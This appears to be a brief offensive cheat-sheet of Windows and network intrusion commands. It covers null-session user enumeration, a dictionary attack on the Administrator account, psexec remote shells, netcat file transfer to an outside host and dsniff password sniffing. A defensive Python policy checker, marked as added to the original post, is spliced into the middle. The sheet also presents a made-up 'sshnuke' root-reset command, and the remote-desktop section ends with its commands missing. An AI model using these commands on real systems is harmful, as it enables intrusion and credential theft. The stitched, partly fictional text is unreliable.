# nmap -sP

Get a list of users on Windows:

> net use \\x.x.x.x\ipc$ "" /USER:""

> net users

What is the password policy:

> net accounts
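Example added here, not part of the original post: a small Python checker that parses the output of `net accounts` and flags settings a defender would want to tighten. The sample output is constructed, and the thresholds are assumptions of mine, not values from the page.

```python
import re

# Constructed sample of `net accounts` output (not captured from a real host).
SAMPLE = """\
Force user logoff how long after time expires?:       Never
Minimum password age (days):                          0
Maximum password age (days):                          42
Minimum password length:                              0
Length of password history maintained:                None
Lockout threshold:                                    Never
Lockout duration (minutes):                           30
Lockout observation window (minutes):                 30
Computer role:                                        WORKSTATION
The command completed successfully.
"""

# One "label:   value" line; the label may itself contain '?' or '(...)'.
LINE_RE = re.compile(r"^(?P<key>.+?):\s{2,}(?P<val>\S.*?)\s*$")

def parse_net_accounts(text):
    """Map each label to its value; numeric values become ints,
    words such as Never/None/Unlimited stay as strings."""
    policy = {}
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        val = m.group("val")
        policy[m.group("key")] = int(val) if val.isdigit() else val
    return policy

# Thresholds below are assumptions roughly in line with common hardening
# baselines; adjust them to your own policy.
def check_policy(policy):
    """Return a list of findings describing weak settings."""
    findings = []
    length = policy.get("Minimum password length", 0)
    if not isinstance(length, int) or length < 14:
        findings.append(f"minimum password length is {length}, want >= 14")
    hist = policy.get("Length of password history maintained", "None")
    if not isinstance(hist, int) or hist < 24:
        findings.append(f"password history is {hist}, want >= 24")
    thresh = policy.get("Lockout threshold", "Never")
    if not isinstance(thresh, int) or thresh > 10:
        findings.append(f"lockout threshold is {thresh}, want 1-10 (Never = no lockout)")
    return findings

if __name__ == "__main__":
    for f in check_policy(parse_net_accounts(SAMPLE)):
        print("WEAK:", f)
```

On a real host, feed the function the captured text of `net accounts` instead of `SAMPLE`.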

Recover a lost password:

> enum -u Administrator -f c:\dict.txt -D x.x.x.x

Logon remotely:

> psexec \\x.x.x.x -u Administrator cmd.exe

Transfer a file with netcat:

$ nc -l -p 6969 > file.txt

$ nc somehost 6969 < file.txt

Listen for passwords flying on the subnet:

# sudo dsniff

Reset the root password on an old server:

$ sshnuke -rootpw="Z1ON0101"

Makeshift remote desktop:

From server:


You will be prompted for a password, and the server will start listening on port 6000 or so. From client:

